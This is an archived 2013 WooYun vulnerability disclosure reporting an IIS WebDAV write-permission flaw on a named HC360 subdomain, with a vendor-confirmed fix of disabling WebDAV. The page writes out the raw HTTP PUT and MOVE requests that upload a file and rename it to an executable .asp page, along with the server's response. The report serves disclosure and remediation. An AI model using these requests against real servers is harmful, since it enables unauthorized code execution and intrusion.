当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-047069

漏洞标题:慧聪网某分站任意代码执行

相关厂商:慧聪网

漏洞作者: kobin97

提交时间:2013-12-26 12:50

修复时间:2014-02-09 12:50

公开时间:2014-02-09 12:50

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-26: 细节已通知厂商并且等待厂商处理中
2013-12-30: 厂商已经确认,细节仅向厂商公开
2014-01-09: 细节向核心白帽子及相关领域专家公开
2014-01-19: 细节向普通白帽子公开
2014-01-29: 细节向实习白帽子公开
2014-02-09: 细节向公众公开

简要描述:

慧聪网某分站因配置不当,导致任意代码执行。

详细说明:

域名:
http://app.info.hc360.com/
存在IIS 写权限漏洞。可以直接写入可执行文件,从而导致任意代码执行。
PUT /test.txt HTTP/1.1
host: app.info.hc360.com
Content-Length: 4
test
MOVE /test.txt HTTP/1.1
host: app.info.hc360.com
Destinaction:http://app.info.hc360.com/iistest.asp

漏洞证明:

http://app.info.hc360.com/iistest.asp
HTTP/1.1 200 OK
Date: Wed, 25 Dec 2013 16:35:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Accept-Ranges: bytes
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Cache-Control: private

修复方案:

关闭 WebDav ,设置好权限

版权声明:转载请注明来源 kobin97@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-12-30 09:34

厂商回复:

谢谢

最新状态:

暂无